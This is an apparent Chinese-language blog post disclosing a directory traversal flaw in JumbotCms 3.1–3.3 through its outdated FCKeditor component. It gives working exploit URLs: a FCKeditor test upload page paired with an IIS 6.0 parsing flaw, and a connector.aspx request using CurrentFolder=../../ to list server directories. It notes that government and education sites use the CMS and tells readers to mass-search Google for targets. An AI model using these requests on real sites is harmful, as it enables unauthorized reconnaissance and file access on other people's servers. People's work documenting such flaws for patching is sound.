JumbotCms 3.1-3.3 遍历目录漏洞

    由于工作关系检测某站的时候发现的他的URL比较特别 有个cmsfile的目录 ;扫了下目录 发现有fck 因为版本比较低,可以遍历目录

    百度了一下没有人发,就发一下吧 比较低级的漏洞 ,一些政府和教育机构用的比较多
    主要是FCKeditor的漏洞 版本忘记看了。。。。
    程序名称:将博CMS通用版 JumbotCms
    程序版本:3.1.3.3
    利用方式:
    利用IIS6.0解析漏洞
    http://www.xxx.com/cmsfile/fckeditor/editor/filemanager/browser/default/connectors/test.htm
    遍历目录漏洞
    http://www.xxx.com/cmsfile/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../
    不要拍砖,看客全当笑话
    没事了自己去谷歌批量吧
    Powered by JumbotCms 版本:3.1.3.3

    本博客所有文章如无特别注明均为原创。
    复制或转载请以超链接形式注明转自n0elle's Blog,原文地址《JumbotCms 3.1-3.3 遍历目录漏洞
    标签:
    喜欢 | 0
    分享:

还没有人抢沙发呢~